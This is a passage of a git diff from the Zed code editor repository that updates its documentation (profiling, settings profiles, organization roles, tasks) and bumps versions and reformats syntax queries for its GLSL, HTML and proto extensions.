[`ensure_final_newline_on_save`](./reference/all-settings.md#ensure-final-newline-on-save) | + +## Notes + +- The first kilobyte of a file is searched for modelines. +- Emacs modelines take precedence over Vim modelines when both are present. +- Modelines in the first few lines take precedence over those at the end of the file. diff --git a/docs/src/outline-panel.md b/docs/src/outline-panel.md index 1bacc3cacf4f556c9c3a06e59d6f3fac9b8c74b0..7b31725bf2cec844881e0c5b0b41aac864e28fc9 100644 --- a/docs/src/outline-panel.md +++ b/docs/src/outline-panel.md @@ -7,8 +7,6 @@ description: Navigate code structure with Zed's outline panel. View symbols, jum In addition to the modal outline (`cmd-shift-o`), Zed offers an outline panel. 
The outline panel can be deployed via `cmd-shift-b` (`outline panel: toggle focus` via the command palette), or by clicking the `Outline Panel` button in the status bar. -> **Changed in Preview (v0.225).** See [release notes](/releases#0.225). - When viewing a "singleton" buffer (i.e., a single file on a tab), the outline panel works similarly to that of the outline modal-it displays the outline of the current buffer's symbols. Each symbol entry shows its type prefix (such as "struct", "fn", "mod", "impl") along with the symbol name, helping you quickly identify what kind of symbol you're looking at. Clicking on an entry allows you to jump to the associated section in the file. The outline view will also automatically scroll to the section associated with the current cursor position within the file. ![Using the outline panel in a singleton buffer](https://zed.dev/img/outline-panel/singleton.png) diff --git a/docs/src/performance.md b/docs/src/performance.md index 09abecdeffe4e268413a73b189ef301511b1a20e..d25ac246f3dbc03ba4286f8e130c566657bbf196 100644 --- a/docs/src/performance.md +++ b/docs/src/performance.md @@ -15,7 +15,7 @@ See [samply](https://github.com/mstange/samply)'s README on how to install and r The profile.json does not contain any symbols. Firefox profiler can add the local symbols to the profile for for. To do that hit the upload local profile button in the top right corner. -image +image # In depth CPU profiling (Tracing) @@ -52,10 +52,47 @@ Download the profiler: ## Usage Open the profiler (tracy-profiler), you should see zed in the list of `Discovered clients` click it. -image -To find functions that take a long time follow this image: -image +image + +Tracy is an incredibly powerful profiler which can do a lot however its UI is not that friendly. This is not the place for an in depth guide to Tracy, I do however want to highlight one particular workflow that is helpful when figuring out why a piece of code is _sometimes_ slow.
+ +Here are the steps: + +1. Click the flamechart button at the top. + +Click flamechart + +2. Click on a function that takes a lot of time. + +Click snapshot + +3. Expand the list of function calls by clicking on main thread. + +Click main thread + +4. Filter that list to the slower calls then click on one of the slow calls in the list + +Select the tail calls in the histogram to filter down the list of calls then click on one call + +5. Click zoom to zone to go to that specific function call in the timeline + +Click zoom to zone + +6. Scroll to zoom in and see more detail about the callers + +Scroll to zoom in + +7. Click on a caller to get statistics on _it_. + +Click on any of the zones to get statistics + +While normally the blue bars in the Tracy timeline correspond to function calls they can time any part of a codebase. In the example below we have added an extra span "for block in edits" and added metadata to it: the block_height. You can do that like this: + +```rust +let span = ztracing::debug_span!("for block in edits", block_height = block.height()); +let _enter = span.enter(); // span guard, when this is dropped the span ends (and its duration is recorded) +``` # Task/Async profiling @@ -78,7 +115,7 @@ Download the importer - `cd import && mkdir build && cd build` - Run cmake to generate build files: `cmake -G Ninja -DCMAKE_BUILD_TYPE=Release ..` - Build the importer: `ninja` -- Run the importer on the trace file: `./tracy-import-miniprofiler /path/to/trace.miniprof /path/to/output.tracy` +- Run the importer on the trace file: `./tracy-import-miniprofiler /path/to/trace.miniprof.json /path/to/output.tracy` - Open the trace in tracy: - If you're on windows download the v0.12.2 version from the releases on the upstream repo - If you're on other platforms open it on the website: https://tracy.nereid.pl/ (the version might mismatch so your luck might vary, we need to host our own ideally..) 
@@ -87,7 +124,7 @@ Download the importer - Run the action: `zed open performance profiler` - Hit the save button. This opens a save dialog or if that fails to open the trace gets saved in your working directory. -- Convert the profile so it can be imported in tracy using the importer: `./tracy-import-miniprofiler output.tracy` +- Convert the profile so it can be imported in tracy using the importer: `./tracy-import-miniprofiler output.tracy` - Go to hit the 'power button' in the top left and then open saved trace. - Now zoom in to see the tasks and how long they took diff --git a/docs/src/reference/all-settings.md b/docs/src/reference/all-settings.md index 23b59f0b91002c0a920df0df8d61088652281735..3c944e0807ff1a6b0cda46c3416ad4e2dbc5a279 100644 --- a/docs/src/reference/all-settings.md +++ b/docs/src/reference/all-settings.md @@ -1800,17 +1800,7 @@ While other options may be changed at a runtime and should be placed under `sett } ``` -3. Use Supermaven as the edit prediction provider: - -```json [settings] -{ - "edit_predictions": { - "provider": "supermaven" - } -} -``` - -4. Turn off edit predictions across all providers +3. Turn off edit predictions across all providers ```json [settings] { @@ -1918,6 +1908,14 @@ WARNING: `{buffer_path}` should not be used to direct your formatter to read fro Here `rust-analyzer` will be used first to format the code, followed by a call of sed. If any of the formatters fails, the subsequent ones will still be executed. +6. To disable the formatter, use `"none"`. This setting disables the configured formatter, but any actions in `code_actions_on_format` will still be executed: + +```json [settings] +{ + "formatter": "none" +} +``` + ## Auto close - Description: Whether to automatically add matching closing characters when typing opening parenthesis, bracket, brace, single or double quote characters. 
@@ -3004,21 +3002,36 @@ If you wish to exclude certain hosts from using the proxy, set the `NO_PROXY` en ## Profiles -- Description: Configuration profiles that can be applied on top of existing settings +- Description: Configuration profiles that can be temporarily applied on top of existing settings or Zed's defaults. - Setting: `profiles` - Default: `{}` **Options** -Configuration object for defining settings profiles. Example: +Each profile is an object with the following optional fields: + +- `base`: What settings to start from before applying the profile's overrides. + - `"user"` (default): Apply on top of your current user settings. + - `"default"`: Apply on top of Zed's default settings, ignoring user customizations. +- `settings`: The settings overrides for this profile. + +Examples: ```json [settings] { "profiles": { - "presentation": { - "buffer_font_size": 20, - "ui_font_size": 18, - "theme": "One Light" + "Presentation": { + "settings": { + "buffer_font_size": 20, + "ui_font_size": 18, + "theme": "One Light" + } + }, + "Clean Slate": { + "base": "default", + "settings": { + "theme": "Ayu Dark" + } } } } @@ -3464,12 +3477,6 @@ Non-negative `integer` values - Setting: `regex` - Default: `false` -### Search On Input - -- Description: Whether to search on input in project search. -- Setting: `search_on_input` -- Default: `true` - ### Center On Match - Description: Whether to center the cursor on each search match when navigating. 
@@ -4629,7 +4636,8 @@ Run the {#action theme_selector::Toggle} action in the command palette to see a "show_user_picture": true, "show_user_menu": true, "show_sign_in": true, - "show_menus": false + "show_menus": false, + "button_layout": "platform_default" } } ``` @@ -4644,6 +4652,7 @@ Run the {#action theme_selector::Toggle} action in the command palette to see a - `show_user_menu`: Whether to show the user menu button in the titlebar (the one that displays your avatar by default and contains options like Settings, Keymap, Themes, etc.) - `show_sign_in`: Whether to show the sign in button in the titlebar - `show_menus`: Whether to show the menus in the titlebar +- `button_layout`: The layout of window control buttons in the title bar (Linux only). Can be set to `"platform_default"` to follow the system setting, `"standard"` to use Zed's built-in layout, or a custom format like `"close:minimize,maximize"` ## Vim @@ -4705,7 +4714,8 @@ Run the {#action theme_selector::Toggle} action in the command palette to see a "bold_folder_labels": false, "drag_and_drop": true, "scrollbar": { - "show": null + "show": null, + "horizontal_scroll": true }, "sticky_scroll": true, "show_diagnostics": "all", @@ -4951,9 +4961,9 @@ Run the {#action theme_selector::Toggle} action in the command palette to see a } ``` -### Scrollbar: Show +### Scrollbar -- Description: Whether to show a scrollbar in the project panel. Possible values: null, "auto", "system", "always", "never". Inherits editor settings when absent, see its description for more details. +- Description: Scrollbar-related settings for the project panel. - Setting: `scrollbar` - Default: @@ -4961,7 +4971,8 @@ Run the {#action theme_selector::Toggle} action in the command palette to see a { "project_panel": { "scrollbar": { - "show": null + "show": null, + "horizontal_scroll": true } } } @@ -4969,29 +4980,8 @@ Run the {#action theme_selector::Toggle} action in the command palette to see a **Options** -1. 
Show scrollbar in the project panel - -```json [settings] -{ - "project_panel": { - "scrollbar": { - "show": "always" - } - } -} -``` - -2. Hide scrollbar in the project panel - -```json [settings] -{ - "project_panel": { - "scrollbar": { - "show": "never" - } - } -} -``` +- `show`: Whether to show a scrollbar in the project panel. Possible values: null, "auto", "system", "always", "never". Inherits editor settings when absent, see its description for more details. +- `horizontal_scroll`: Whether to allow horizontal scrolling in the project panel. When `false`, the view is locked to the leftmost position and long file names are clipped. ### Sort Mode @@ -5118,7 +5108,8 @@ See the [debugger page](../debugger.md) for more information about debugging sup "collapse_untracked_diff": false, "scrollbar": { "show": null - } + }, + "starts_open": false } } ``` @@ -5133,6 +5124,7 @@ See the [debugger page](../debugger.md) for more information about debugging sup - `sort_by_path`: Whether to sort entries in the panel by path or by status (the default) - `collapse_untracked_diff`: Whether to collapse untracked files in the diff panel - `scrollbar`: When to show the scrollbar in the git panel +- `starts_open`: Whether the git panel should open on startup ## Git Worktree Directory @@ -5355,12 +5347,12 @@ For example, to use `Nerd Font` as a fallback, add the following to your setting ## Settings Profiles -- Description: Configure any number of settings profiles that are temporarily applied on top of your existing user settings when selected from `settings profile selector: toggle`. +- Description: Configure any number of settings profiles that are temporarily applied when selected from `settings profile selector: toggle`. - Setting: `profiles` - Default: `{}` In your `settings.json` file, add the `profiles` object. -Each key within this object is the name of a settings profile, and each value is an object that can include any of Zed's settings. 
+Each key within this object is the name of a settings profile. Each profile has an optional `base` field (`"user"` or `"default"`) and a `settings` object containing any of Zed's settings. Example: @@ -5368,24 +5360,30 @@ Example: { "profiles": { "Presenting (Dark)": { - "agent_buffer_font_size": 18.0, - "buffer_font_size": 18.0, - "theme": "One Dark", - "ui_font_size": 18.0 + "settings": { + "agent_buffer_font_size": 18.0, + "buffer_font_size": 18.0, + "theme": "One Dark", + "ui_font_size": 18.0 + } }, "Presenting (Light)": { - "agent_buffer_font_size": 18.0, - "buffer_font_size": 18.0, - "theme": "One Light", - "ui_font_size": 18.0 + "settings": { + "agent_buffer_font_size": 18.0, + "buffer_font_size": 18.0, + "theme": "One Light", + "ui_font_size": 18.0 + } }, "Writing": { - "agent_buffer_font_size": 15.0, - "buffer_font_size": 15.0, - "theme": "Catppuccin Frappé - No Italics", - "ui_font_size": 15.0, - "tab_bar": { "show": false }, - "toolbar": { "breadcrumbs": false } + "settings": { + "agent_buffer_font_size": 15.0, + "buffer_font_size": 15.0, + "theme": "Catppuccin Frappé - No Italics", + "ui_font_size": 15.0, + "tab_bar": { "show": false }, + "toolbar": { "breadcrumbs": false } + } } } } diff --git a/docs/src/roles.md b/docs/src/roles.md new file mode 100644 index 0000000000000000000000000000000000000000..6c1ce7a8928955d16f8f70c024fd4133c85837bc --- /dev/null +++ b/docs/src/roles.md @@ -0,0 +1,71 @@ +--- +title: Roles - Zed +description: Understand Zed's organization roles and what each role can access, manage, and configure. +--- + +# Roles + +Every member of a Zed organization is assigned a role that determines +what they can access and configure. 
+ +## Role Types {#roles} + +Every member of an organization is assigned one of three roles: + +| Role | Description | +| ---------- | ------------------------------------------------------ | +| **Owner** | Full control, including billing and ownership transfer | +| **Admin** | Full control, except billing | +| **Member** | Standard access, no privileged actions | + +### Owner {#role-owner} + +An owner has full control over the organization, including: + +- Invite and remove members +- Assign and change member roles +- Manage billing, payment methods, and invoices +- Configure data-sharing policies +- Disable Zed's collaborative features +- Control whether members can use Zed-hosted models and Zed's edit predictions +- Transfer ownership to another member + +### Admin {#role-admin} + +Admins have the same capabilities as the Owner, except they cannot: + +- Access or modify billing settings +- Transfer organization ownership + +This role is suited for team leads or managers who handle day-to-day +member access without needing visibility into payment details. + +### Member {#role-member} + +Members have standard access to Zed. They cannot access billing or +organization settings. + +## Managing User Roles {#managing-users} + +Owners and Admins can manage organization members from the Zed +dashboard within the Members page. + +### Inviting Members {#inviting-members} + +1. On the Members page, select **+ Invite Member**. +2. Enter the member's company email address and choose a role. +3. The invitee receives an email with instructions to join. After + accepting, they authenticate via GitHub. + +### Changing a Member's Role {#changing-roles} + +1. On the Members page, find the member. You can filter by role or + search by name. +2. Open the three-dot menu and select a new role. + +### Removing a Member {#removing-members} + +1. On the Members page, find the member. +2. Select **Remove** and confirm. 
+ +Removing a member removes their access to organization settings and any organization-managed features. They can continue using Zed on their own. diff --git a/docs/src/semantic-tokens.md b/docs/src/semantic-tokens.md index ab30525c504455fc7f1fa431b212b975c1d75061..d26666ca7e7e60614bd4f1f9f06e771168611de2 100644 --- a/docs/src/semantic-tokens.md +++ b/docs/src/semantic-tokens.md @@ -48,7 +48,7 @@ You can configure this globally or per-language: Semantic tokens are styled using rules that map LSP token types and modifiers to theme styles or custom colors. Zed provides sensible defaults, but you can customize these in your settings.json: add rules under `global_lsp_settings.semantic_token_rules` key. Rules are matched in order, and the first matching rule wins. -User-defined rules take precedence over defaults. +User-defined rules take highest precedence, followed by extension-provided language rules, then Zed defaults. ### Rule Structure @@ -139,7 +139,7 @@ To disable highlighting for a specific token type, add an empty rule that matche } ``` -Since user rules are prepended to defaults and the first match wins, this empty rule prevents any styling from being applied to comment tokens. +Since user rules take highest precedence and the first match wins, this empty rule prevents any styling from being applied to comment tokens. ## Default Rules diff --git a/docs/src/snippets.md b/docs/src/snippets.md index 72cbec7b20ff694304a58a70cd9b142a60fc58a2..9f6b6c880be9edcace23f0e3fd0a02263549776a 100644 --- a/docs/src/snippets.md +++ b/docs/src/snippets.md @@ -42,24 +42,4 @@ To create JSX snippets you have to use `javascript.json` snippets file, instead ## Known Limitations - Only the first prefix is used when a list of prefixes is passed in. -- Currently only the `json` snippet file format is supported, even though the `simple-completion-language-server` supports both `json` and `toml` file formats. 
- -## See also - -The `feature_paths` option in `simple-completion-language-server` is disabled by default. - -If you want to enable it you can add the following to your `settings.json`: - -```json [settings] -{ - "lsp": { - "snippet-completion-server": { - "settings": { - "feature_paths": true - } - } - } -} -``` - -For more configuration information, see the [`simple-completion-language-server` instructions](https://github.com/zed-industries/simple-completion-language-server/tree/main). +- Currently only the `json` snippet file format is supported. diff --git a/docs/src/tasks.md b/docs/src/tasks.md index 0fa659eb2cc58fe63536e721475b0093e0650618..3bbef85e9760ad036b75d50f26d3536b2e5b20f1 100644 --- a/docs/src/tasks.md +++ b/docs/src/tasks.md @@ -50,7 +50,12 @@ Zed supports ways to spawn (and rerun) commands using its integrated [terminal]( // Whether to show the task line in the output of the spawned task, defaults to `true`. "show_summary": true, // Whether to show the command line in the output of the spawned task, defaults to `true`. - "show_command": true + "show_command": true, + // Which edited buffers to save before running the task: + // * `all` — save all edited buffers + // * `current` — save currently active buffer only + // * `none` — don't save any buffers + "save": "none" // Represents the tags for inline runnable indicators, or spawning multiple tasks at once. // "tags": [] } @@ -89,6 +94,7 @@ These variables allow you to pull information from the current editor and use it - `ZED_STEM`: stem (filename without extension) of the currently opened file (e.g. `main`) - `ZED_SYMBOL`: currently selected symbol; should match the last symbol shown in a symbol breadcrumb (e.g. `mod tests > fn test_task_contexts`) - `ZED_SELECTED_TEXT`: currently selected text +- `ZED_LANGUAGE`: language of the currently opened buffer (e.g. `Rust`, `Python`, `Shell Script`) - `ZED_WORKTREE_ROOT`: absolute path to the root of the current worktree. (e.g. 
`/Users/my-user/path/to/project`) - `ZED_CUSTOM_RUST_PACKAGE`: (Rust-specific) name of the parent package of $ZED_FILE source file. @@ -225,8 +231,6 @@ This could be useful for launching a terminal application that you want to use i ## VS Code Task Format -> **Preview:** This feature is available in Zed Preview. It will be included in the next Stable release. - When importing VS Code tasks from `.vscode/tasks.json`, you can omit the `label` field. Zed automatically generates labels based on the task type: - **npm tasks**: `npm: {{/if}} + +
@@ -307,6 +309,50 @@ {{/next}}
+
@@ -378,6 +424,31 @@ + + {{/if}} @@ -407,23 +478,82 @@ {{/if}} {{/if}} - - + +
diff --git a/docs/theme/page-toc.css b/docs/theme/page-toc.css index 6a16265976c8c9d8861c2791206464f1bcb4ceec..6f88ccc429eb6f29015c26722f2b9cce49807008 100644 --- a/docs/theme/page-toc.css +++ b/docs/theme/page-toc.css @@ -5,7 +5,7 @@ display: flex; flex-direction: column; gap: 4px; - padding: 28px 0 120px 0; + padding: 16px 0 120px 0; width: 200px; max-height: calc(100svh - 50px); overflow-x: hidden; diff --git a/docs/theme/plugins.css b/docs/theme/plugins.css index 8c9f0c438e8e1ecd43cd770183d0a6a3bbfe0a4f..ef59e97072bd2c2a6e580afca79bbe3dafa37f6b 100644 --- a/docs/theme/plugins.css +++ b/docs/theme/plugins.css @@ -1,8 +1,8 @@ kbd.keybinding { background-color: var(--keybinding-bg); - padding: 2px 4px; - border-radius: 3px; - font-family: monospace; + padding: 4px 4px 6px 4px; + border-radius: 4px; + font-family: var(--mono-font); display: inline-block; margin: 0 2px; } diff --git a/extensions/README.md b/extensions/README.md index c677e0b909c0a31c53a9b91f24c317d29c182420..d705cb65fdfffbaa7a9673382a1d63dc0b5cbcc9 100644 --- a/extensions/README.md +++ b/extensions/README.md @@ -8,56 +8,10 @@ If you are looking for the Zed extension registry, see the [`zed-industries/exte Currently, Zed includes support for a number of languages without requiring installing an extension. Those languages can be found under [`crates/languages/src`](https://github.com/zed-industries/zed/tree/main/crates/languages/src). -Support for all other languages is done via extensions. This directory ([extensions/](https://github.com/zed-industries/zed/tree/main/extensions/)) contains a number of officially maintained extensions. 
These extensions use the same [zed_extension_api](https://docs.rs/zed_extension_api/latest/zed_extension_api/) available to all [Zed Extensions](https://zed.dev/extensions) for providing [language servers](https://zed.dev/docs/extensions/languages#language-servers), [tree-sitter grammars](https://zed.dev/docs/extensions/languages#grammar) and [tree-sitter queries](https://zed.dev/docs/extensions/languages#tree-sitter-queries). +Support for all other languages is done via extensions. This directory ([extensions/](https://github.com/zed-industries/zed/tree/main/extensions/)) contains some of the officially maintained extensions. These extensions use the same [zed_extension_api](https://docs.rs/zed_extension_api/latest/zed_extension_api/) available to all [Zed Extensions](https://zed.dev/extensions) for providing [language servers](https://zed.dev/docs/extensions/languages#language-servers), [tree-sitter grammars](https://zed.dev/docs/extensions/languages#grammar) and [tree-sitter queries](https://zed.dev/docs/extensions/languages#tree-sitter-queries). + +You can find the other officially maintained extensions in the [zed-extensions organization](https://github.com/zed-extensions). ## Dev Extensions See the docs for [Developing an Extension Locally](https://zed.dev/docs/extensions/developing-extensions#developing-an-extension-locally) for how to work with one of these extensions. - -## Updating - -> [!NOTE] -> This update process is usually handled by Zed staff. -> Community contributors should just submit a PR (step 1) and we'll take it from there. - -The process for updating an extension in this directory has three parts. - -1. Create a PR with your changes. (Merge it) -2. 
Bump the extension version in: - - - extensions/{language_name}/extension.toml - - extensions/{language_name}/Cargo.toml - - Cargo.lock - - You can do this manually, or with a script: - - ```sh - # Output the current version for a given language - ./script/language-extension-version - - # Update the version in `extension.toml` and `Cargo.toml` and trigger a `cargo check` - ./script/language-extension-version - ``` - - Commit your changes to a branch, push a PR and merge it. - -3. Open a PR to [`zed-industries/extensions`](https://github.com/zed-industries/extensions) repo that updates the extension in question - -Edit [`extensions.toml`](https://github.com/zed-industries/extensions/blob/main/extensions.toml) in the extensions repo to reflect the new version you set above and update the submodule latest Zed commit. - -```sh -# Go into your clone of the extensions repo -cd ../extensions - -# Update -git checkout main -git pull -just init-submodule extensions/zed - -# Update the Zed submodule -cd extensions/zed -git checkout main -git pull -cd - -git add extensions.toml extensions/zed -``` diff --git a/extensions/glsl/Cargo.toml b/extensions/glsl/Cargo.toml index fd39ac82debb3eabf78219a730e090c002c88395..a02c93c0387424255fa32abf8fb027e2d923b809 100644 --- a/extensions/glsl/Cargo.toml +++ b/extensions/glsl/Cargo.toml @@ -1,6 +1,6 @@ [package] name = "zed_glsl" -version = "0.2.0" +version = "0.2.3" edition.workspace = true publish.workspace = true license = "Apache-2.0" diff --git a/extensions/glsl/extension.toml b/extensions/glsl/extension.toml index 867b679ea6b9cf0f42e87938e85b5b69bbd435e3..1fcc888ebdfc14b1fb94d136c99e2ef6b7008b94 100644 --- a/extensions/glsl/extension.toml +++ b/extensions/glsl/extension.toml @@ -1,7 +1,7 @@ id = "glsl" name = "GLSL" description = "GLSL support." 
-version = "0.2.0" +version = "0.2.3" schema_version = 1 authors = ["Mikayla Maki "] repository = "https://github.com/zed-industries/zed" diff --git a/extensions/glsl/languages/glsl/brackets.scm b/extensions/glsl/languages/glsl/brackets.scm index 62e137ef2629f3b7f7aeafbad419a36d19361d19..e83d67f411a71f2602dc774531d904a949c45b9a 100644 --- a/extensions/glsl/languages/glsl/brackets.scm +++ b/extensions/glsl/languages/glsl/brackets.scm @@ -1,3 +1,8 @@ -("[" @open "]" @close) -("{" @open "}" @close) -("(" @open ")" @close) +("[" @open + "]" @close) + +("{" @open + "}" @close) + +("(" @open + ")" @close) diff --git a/extensions/glsl/languages/glsl/config.toml b/extensions/glsl/languages/glsl/config.toml index 0c71419c91e40f4b5fc65c10c882ac5c542a080c..ecb1a43f6803e40cd7e2bf003be5c32066dae3fd 100644 --- a/extensions/glsl/languages/glsl/config.toml +++ b/extensions/glsl/languages/glsl/config.toml @@ -5,6 +5,8 @@ path_suffixes = [ "vert", "frag", "tesc", "tese", "geom", # Compute shaders "comp", + # Mesh pipeline shaders + "task", "mesh", # Ray tracing pipeline shaders "rgen", "rint", "rahit", "rchit", "rmiss", "rcall", # Other diff --git a/extensions/glsl/languages/glsl/highlights.scm b/extensions/glsl/languages/glsl/highlights.scm index 09f94d4fb587963254c9bc31ec25b66a0e1e4323..0509d0f5ef00977a8f809baa4684a09628dd0172 100644 --- a/extensions/glsl/languages/glsl/highlights.scm +++ b/extensions/glsl/languages/glsl/highlights.scm @@ -1,82 +1,96 @@ -"break" @keyword -"case" @keyword -"const" @keyword -"continue" @keyword -"default" @keyword -"do" @keyword -"else" @keyword -"enum" @keyword -"extern" @keyword -"for" @keyword -"if" @keyword -"inline" @keyword -"return" @keyword -"sizeof" @keyword -"static" @keyword -"struct" @keyword -"switch" @keyword -"typedef" @keyword -"union" @keyword -"volatile" @keyword -"while" @keyword - -"#define" @keyword -"#elif" @keyword -"#else" @keyword -"#endif" @keyword -"#if" @keyword -"#ifdef" @keyword -"#ifndef" @keyword -"#include" @keyword 
-(preproc_directive) @keyword - -"--" @operator -"-" @operator -"-=" @operator -"->" @operator -"=" @operator -"!=" @operator -"*" @operator -"&" @operator -"&&" @operator -"+" @operator -"++" @operator -"+=" @operator -"<" @operator -"==" @operator -">" @operator -"||" @operator - -"." @delimiter -";" @delimiter - -(string_literal) @string -(system_lib_string) @string - -(null) @constant -(number_literal) @number -(char_literal) @number +[ + "break" + "case" + "const" + "continue" + "default" + "do" + "else" + "enum" + "extern" + "for" + "if" + "inline" + "return" + "sizeof" + "static" + "struct" + "switch" + "typedef" + "union" + "volatile" + "while" + "#define" + "#elif" + "#else" + "#endif" + "#if" + "#ifdef" + "#ifndef" + "#include" + (preproc_directive) +] @keyword + +[ + "--" + "-" + "-=" + "->" + "=" + "!=" + "*" + "&" + "&&" + "+" + "++" + "+=" + "<" + "==" + ">" + "||" + "." + ";" +] @operator + +[ + (string_literal) + (system_lib_string) +] @string + +(null) @constant.builtin + +[ + (number_literal) + (char_literal) +] @number (identifier) @variable (field_identifier) @property + (statement_identifier) @label -(type_identifier) @type -(primitive_type) @type -(sized_type_specifier) @type + +[ + (type_identifier) + (primitive_type) + (sized_type_specifier) +] @type (call_expression function: (identifier) @function) + (call_expression function: (field_expression field: (field_identifier) @function)) + (function_declarator declarator: (identifier) @function) + (preproc_function_def name: (identifier) @function.special) ((identifier) @constant - (#match? @constant "^[A-Z][A-Z\\d_]*$")) + (#match? @constant "^[A-Z][A-Z\\d_]*$")) (comment) @comment @@ -111,7 +125,5 @@ (extension_storage_class) @storageclass -( - (identifier) @variable.builtin - (#match? @variable.builtin "^gl_") -) +((identifier) @variable.builtin + (#match? 
@variable.builtin "^gl_")) diff --git a/extensions/glsl/languages/glsl/injections.scm b/extensions/glsl/languages/glsl/injections.scm new file mode 100644 index 0000000000000000000000000000000000000000..2f0e58eb6431515b86b6042e5828263341513e99 --- /dev/null +++ b/extensions/glsl/languages/glsl/injections.scm @@ -0,0 +1,2 @@ +((comment) @injection.content + (#set! injection.language "comment")) diff --git a/extensions/html/Cargo.toml b/extensions/html/Cargo.toml index 2c89f86cb450b7ea8476bffdff003a94b137d213..aefe0eb120b9e277d57212a9062fd2f899a08a09 100644 --- a/extensions/html/Cargo.toml +++ b/extensions/html/Cargo.toml @@ -1,6 +1,6 @@ [package] name = "zed_html" -version = "0.3.0" +version = "0.3.1" edition.workspace = true publish.workspace = true license = "Apache-2.0" diff --git a/extensions/html/extension.toml b/extensions/html/extension.toml index 68ab0e4b9d3f56fca17cbd518d5990edc2ec711a..eb8fc1862197deaa82ffa28453dba007583411b5 100644 --- a/extensions/html/extension.toml +++ b/extensions/html/extension.toml @@ -1,7 +1,7 @@ id = "html" name = "HTML" description = "HTML support." -version = "0.3.0" +version = "0.3.1" schema_version = 1 authors = ["Isaac Clayton "] repository = "https://github.com/zed-industries/zed" diff --git a/extensions/html/languages/html/brackets.scm b/extensions/html/languages/html/brackets.scm index adc11a1d7408ae33b80f0daa78a03d8f3352b745..02619c109f3ff2d830948e8e8c4889e1e733fae9 100644 --- a/extensions/html/languages/html/brackets.scm +++ b/extensions/html/languages/html/brackets.scm @@ -2,11 +2,11 @@ "/>" @close) (#set! rainbow.exclude)) -(("" @close) (#set! rainbow.exclude)) -(("<" @open +(("" @close) (#set! 
rainbow.exclude)) diff --git a/extensions/html/languages/html/highlights.scm b/extensions/html/languages/html/highlights.scm index bb3b43e813929de705605e3ecc3e0b1052c48297..21bf193cf346313024ba8df6e7457c785e21476e 100644 --- a/extensions/html/languages/html/highlights.scm +++ b/extensions/html/languages/html/highlights.scm @@ -1,12 +1,17 @@ (tag_name) @tag + (doctype) @tag.doctype + (attribute_name) @attribute + [ "\"" "'" (attribute_value) ] @string + (comment) @comment + (entity) @string.special "=" @punctuation.delimiter.html diff --git a/extensions/html/languages/html/indents.scm b/extensions/html/languages/html/indents.scm index 436663dba3e1993c84e151f09c581844fdcb977a..6e5bf97d4c3edeb251cdcffdaf6c9f9659d39849 100644 --- a/extensions/html/languages/html/indents.scm +++ b/extensions/html/languages/html/indents.scm @@ -1,5 +1,8 @@ -(start_tag ">" @end) @indent -(self_closing_tag "/>" @end) @indent +(start_tag + ">" @end) @indent + +(self_closing_tag + "/>" @end) @indent (element (start_tag) @start diff --git a/extensions/html/languages/html/injections.scm b/extensions/html/languages/html/injections.scm index 525b3efe29dca541afc8829dd41ff217f48439c3..e9c2c98155768fdee9a4fcefe672bebf7d4ce8f4 100644 --- a/extensions/html/languages/html/injections.scm +++ b/extensions/html/languages/html/injections.scm @@ -1,6 +1,5 @@ ((comment) @injection.content - (#set! injection.language "comment") -) + (#set! injection.language "comment")) (script_element (raw_text) @injection.content @@ -11,11 +10,15 @@ (#set! injection.language "css")) (attribute - (attribute_name) @_attribute_name (#match? @_attribute_name "^style$") - (quoted_attribute_value (attribute_value) @injection.content) - (#set! injection.language "css")) + (attribute_name) @_attribute_name + (#match? @_attribute_name "^style$") + (quoted_attribute_value + (attribute_value) @injection.content) + (#set! injection.language "css")) (attribute - (attribute_name) @_attribute_name (#match? 
@_attribute_name "^on[a-z]+$") - (quoted_attribute_value (attribute_value) @injection.content) - (#set! injection.language "javascript")) + (attribute_name) @_attribute_name + (#match? @_attribute_name "^on[a-z]+$") + (quoted_attribute_value + (attribute_value) @injection.content) + (#set! injection.language "javascript")) diff --git a/extensions/html/languages/html/overrides.scm b/extensions/html/languages/html/overrides.scm index 434f610e70242be8589a9f58cc7fd4704d5d9296..3e9e499e5c95b960e7ec9fe4e46bb078b8043092 100644 --- a/extensions/html/languages/html/overrides.scm +++ b/extensions/html/languages/html/overrides.scm @@ -1,4 +1,5 @@ (comment) @comment + (quoted_attribute_value) @string [ diff --git a/extensions/html/src/html.rs b/extensions/html/src/html.rs index 337689ebddd427769ab985ad82512f76b601e67c..a5e38c97b3613ca735fb4eea8f26472ab3f66049 100644 --- a/extensions/html/src/html.rs +++ b/extensions/html/src/html.rs @@ -95,11 +95,8 @@ impl zed::Extension for HtmlExtension { server_id: &LanguageServerId, worktree: &zed::Worktree, ) -> Result> { - let settings = LspSettings::for_worktree(server_id.as_ref(), worktree) - .ok() - .and_then(|lsp_settings| lsp_settings.settings) - .unwrap_or_default(); - Ok(Some(settings)) + LspSettings::for_worktree(server_id.as_ref(), worktree) + .map(|lsp_settings| lsp_settings.settings) } fn language_server_initialization_options( diff --git a/extensions/proto/Cargo.toml b/extensions/proto/Cargo.toml index 68a524ed944b0db1fd75b9ec5ca5e0b1aa99e89f..5ca9720e25fb7cb115004d0de7c47e45d7e6252a 100644 --- a/extensions/proto/Cargo.toml +++ b/extensions/proto/Cargo.toml @@ -1,6 +1,6 @@ [package] name = "zed_proto" -version = "0.3.1" +version = "0.3.2" edition.workspace = true publish.workspace = true license = "Apache-2.0" diff --git a/extensions/proto/extension.toml b/extensions/proto/extension.toml index 70ebed1ca50635d9e818ce216920937a547b64c4..42985998e4dc934f9b6860ee0a5778a097d5723a 100644 --- a/extensions/proto/extension.toml +++ 
